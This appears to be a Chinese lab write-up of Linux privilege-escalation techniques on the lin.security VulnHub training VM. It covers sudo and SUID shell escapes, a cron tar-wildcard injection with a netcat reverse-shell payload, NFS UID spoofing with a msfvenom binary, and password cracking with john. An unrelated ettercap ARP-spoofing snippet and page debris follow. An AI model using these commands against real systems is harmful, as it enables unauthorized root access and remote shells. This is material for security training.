lin.security_v1.0靶机

一、靶机下载地址

https://download.vulnhub.com/linsecurity/lin.security_v1.0.ova

二、配置环境

1.配置ens33环境,打开虚拟机时按下shift键进入此界面

2.按e键进入,在末尾处找到ro,将他替换为rw sigine init=/bin/bash

3.按下ctrl+x键,进入以下界面

4.进入netplan目录修改里面的文件

cd /etc/netplan

5.vim修改,将红框处改为ens33

6.重启网卡,修改完后重启靶机即可发现ip地址

Ifconfig ens33 down
ifconfig ens33 up

三、sudo提权

1、主机发现

#使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:75:DC:71'

2、SSH连接靶机、账号密码为bob:secret

# 使用命令
ssh bob@192.168.23.166

3、查看当前用户和权限

# 使用命令
# 查看当前用户
whoami
# 查看用户权限
id

4、查看内核版本信息

# 使用命令
# uname -r

5、输入sudo -l显示允许当前用户使用的命令

# 使用命令
# sudo -l

6、使用辅助网址、根据结果执行对应命令进行提权

# 辅助网址
# https://gtfobins.github.io/

ash:

# 使用命令
# sudo ash

awk:

# 使用命令
# sudo awk 'BEGIN {system("/bin/sh")}'

bash:

# 使用命令
# sudo bash

四、SUID提权

1、查看suid文件

# 使用命令
# find / -perm -u=s -type f 2>/dev/null

2、使用辅助网址、根据结果执行对应命令进行提权

# 辅助网址
# https://gtfobins.github.io/

taskset:

# 使用命令
# taskset 1 /bin/bash -p

五、计划任务提权

1、查看计划任务

# 使用命令
# cat /etc/crontab

2、生成payload

# 使用命令
# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.145.146 lport=9999 R

# payload
mkfifo /tmp/gomlnf; nc 192.168.145.146 9999 0</tmp/gomlnf | /bin/sh >/tmp/gomlnf 2>&1; rm /tmp/gomlnf

3、靶机执行命令

# 使用命令
# echo "mkfifo /tmp/jeuhde; nc 192.168.145.146 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde" > shell.sh && chmod +x shell.sh

# echo > "--checkpoint-action=exec=sh shell.sh"

# echo > "--checkpoint=1"

# nc -lvnp 9999

发现没有成功反弹上

六、NFS提权

1、查看是否开启NFS

# 使用命令
# cat /etc/exports

2、查看可以访问的NFS目录

# 使用命令
# showmount -e 192.168.23.166

3、创建nfs目录并挂载

# 使用命令
# mkdir /tmp/nfs

4、挂载目录到/tmp/nfs

# 使用命令
# mount -o rw,vers=3 192.168.145.174:/home/peter /tmp/nfs

5、生成恶意文件,发现没有写入权限,创建一个gid为1005的用户组,然后创建peter账户,uid指定为1001,gid指定为1005

# 使用命令
# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

# 创建用户组
# groupadd -g 1005 peter
# 创建用户
# adduser peter -uid 1001 -gid 1005

6、切换到peter用户,再次生成恶意文件

# 使用命令
# su peter
# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

7、赋予shell.elf文件后执行,发现成功执行,但是没有提权

# 使用命令
# chmod +x shell.elf
# ./shell.elf

七、不安全配置

1、查看/etc/passwd文件、发现有一个有root权限的用户存在加密的密码

# 使用命令
# cat /etc/passwd

2、将密码写入1.txt文件中,利用john进行解密、得到密码为P@ssw0rd

# 使用命令
# vi 1.txt

# 使用john进行解密
# sudo john --wordlist=rockyou.txt 1.txt

3、登录insecurity用户、成功提权

# 使用命令
# su insecurity

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
以下是具体的操作步骤和命令行: 1. 首先,启动Kali Linux和Windows 10虚拟机,并确保它们位于同一网络段中。可以使用ifconfig命令检查Kali Linux的IP地址和netstat命令检查Windows 10的IP地址。 2. 打开终端,输入以下命令安装ettercap: ``` sudo apt-get update sudo apt-get install ettercap-graphical ``` 3. 打开ettercap,选择“Sniff”>“Unified sniffing”,选择网卡并单击“Start”开始嗅探。 4. 在ettercap中,选择“Hosts”>“Scan for hosts”扫描网络中的主机。检查靶机的IP地址是否正确显示。 5. 在ettercap中,选择“Hosts”>“Host list”查看网络中的主机列表。确保靶机和网关的MAC地址已成功获取。 6. 在ettercap中,选择“Hosts”>“Host to IP”,将靶机的IP地址输入到“Target 1”中,将网关的IP地址输入到“Target 2”中,然后单击“Add”. 7. 在ettercap中,选择“Mitm”>“ARP poisoning”,选择“Sniff remote connections”和“Sniff HTTP/HTTPS”,然后单击“OK”。这将开始arp欺骗攻击。 8. 现在,当靶机尝试访问www.nlc.cn时,所有流量都将被重定向到Kali Linux的IP地址172.20.10.10。可以使用以下命令查看重定向的流量: ``` sudo tcpdump -i <interface> -n -vvv ``` 其中<interface>应替换为您的网络接口名称。 9. 若要停止arp欺骗攻击,可以在ettercap中选择“Mitm”>“Stop mitm attack”。 请注意:ARP欺骗是一种非常危险的攻击方法,仅在合法和授权的测试环境中使用。在尝试进行任何安全测试之前,请确保您已获得适当的授权和许可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值